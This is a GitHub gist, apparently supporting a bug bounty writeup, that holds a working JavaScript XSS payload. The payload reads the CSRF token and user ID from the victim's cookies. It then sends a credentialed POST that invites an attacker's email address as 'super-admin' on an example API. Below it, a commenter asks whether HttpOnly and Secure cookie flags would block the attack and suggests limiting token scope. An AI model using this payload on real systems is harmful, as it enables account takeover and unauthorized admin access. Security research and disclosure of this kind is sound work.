Skip to content

Instantly share code, notes, and snippets.

@Melotover
Last active March 17, 2024 14:20
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Melotover/642d797ad890780b1aced8bde0acbffc to your computer and use it in GitHub Desktop.
Save Melotover/642d797ad890780b1aced8bde0acbffc to your computer and use it in GitHub Desktop.
for writeup!
var email = "ATTACKER_EMAIl";
// Set the attacker email that we will receive the invitation to it.
var csrf= document.cookie.split('; ').find(row => row.startsWith('example-csrf')).split('=')[1];
// Getting the csrf value from [example-csrf] cookie parameter and store it in the csrf variable.
var pid= document.cookie.split('; ').find(row => row.startsWith('USER_ID')).split('=')[1];
// Getting the pid value from [USER_ID] cookie parameter and store it in the pid variable.
// Initiate the XHR POST request that holds the data we collect!
var http=new XMLHttpRequest();
http.open('POST','https://api.example.com/app/v1/users/add/?Pid='+pid+'&clienttimeout=14000&app=users&version=1.0', true);
http.withCredentials=true;
// To send the victim cookies with the request!
http.setRequestHeader('X-example-CSRF',csrf);
http.setRequestHeader('Content-type','application/json');
// Setting the required headers!
http.send('{"users":[{"email":"'+email+'" ,"emailSent":true,"firstName":"","lastName":"","roleNames":[],"jita":false,"expiresAt":null,"primaryTeamId":-1,"secondaryTeamIds":[],"partner":false,"pending":false,"existingInexample":false,"hasTwoFactorBackupCodes":false,"hasTwoFactorConfigured":false,"userAssetsCount":null,"scim":false}],"roleNames":["super-admin"],"teamId":null,"secondaryTeamIds":[],"sendWelcomeEmail":true,"forceWelcomeEmail":true}');
@syonfox
Copy link

syonfox commented Mar 17, 2024

question does making a cookie "Secure; HttpOnly;"

like so:

Set-Cookie: id=a3fWa; Expires=Thu, 21 Oct 2021 07:28:00 GMT; Secure; HttpOnly

prevent this by not allowing js access to the secured cookie

maybe??
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#restrict_access_to_cookies

note: im not sure if this is best UX as we want our developers to be able to easly obtain a token and use it to authenticate requests. Although in any practical secure environment they will be supplied as env variables sometimes you wish to manually authenticate a code

therefore you should then set the secure cookie yourself and forget about it to prevent possible xss token acess.

further you should limit the access of each user so that a token compromise is not impactful if possible. read only or 2 factor maybe??

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment